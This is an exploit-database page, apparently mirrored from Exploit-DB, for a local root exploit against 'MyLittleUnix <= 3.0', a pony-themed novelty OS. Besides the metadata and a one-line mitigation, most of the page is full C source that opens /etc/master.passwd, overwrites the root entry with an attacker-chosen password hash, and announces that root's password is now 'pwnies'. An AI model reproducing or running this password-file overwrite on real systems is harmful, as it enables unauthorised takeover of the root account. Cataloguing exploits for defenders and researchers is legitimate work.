header-logo
Suggest Exploit
vendor:
mlp OS
by:
prdelka
7.2
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name: mlp OS
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: o:mylittleunix:mlp_os:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

MyLittleUnix <= 3.0 VFS permissions root exploit

This exploit abuses the lack of file permissions checking in MyLittleUnix <= 3.0 to replace the root user password with the attacker's own and escalate their privileges. This exploit is now 20% cooler and tested on the latest 3.0 mlp OS.

Mitigation:

Ensure that file permissions are checked and that the root user password is secure.
Source

Exploit-DB raw data:

/* MyLittleUnix <= 3.0 VFS permissions root exploit 
   ================================================
   File permissions are not checked, we can abuse 
   this to replace the root user password with our
   own and escalate our privileges. This exploit 
   now 20% cooler and tested on latest 3.0 mlp OS.

   -- prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

char* pwnystr = "root:07821d2459368443042007bf1c7cdf3c55284"
		"29a65f8f10ce388d301b47865a283147bfd290545b"
		"0b9b12ae622a8eb359497cb3635506f99d2f5e4c4e"
		"594cadd:0:0:HackerFantastic:/home/root:/bi"
		"n/sh:fancy\n";

int main(){
	int fd, r;
	struct stat *fileinfo = malloc(sizeof(struct stat));
	char *buffer, *line, *filenm = "/etc/master.passwd";
	printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n");
	fd = open(filenm,O_RDWR);
	r = stat(filenm,fileinfo);
	buffer = malloc((uint)fileinfo->st_size);
	if(buffer){
		read(fd,buffer,fileinfo->st_size);
	}
	else{
		printf("[!] No pwn for you pwnie\n");
		exit(0);
	}
	lseek(fd,0,SEEK_SET);
	line = strtok(buffer,"\n");
	while(line){
		if(strstr(line,"root:")){
			write(fd,pwnystr,strlen(pwnystr));
		}
		else{
			write(fd,line,strlen(line));
			write(fd,"\n",strlen("\n"));
		}
		line = strtok(NULL,"\n");
	}
	close(fd);
	printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n");
	exit(0);
}

Navigation

Suggest Exploit

Services By CQR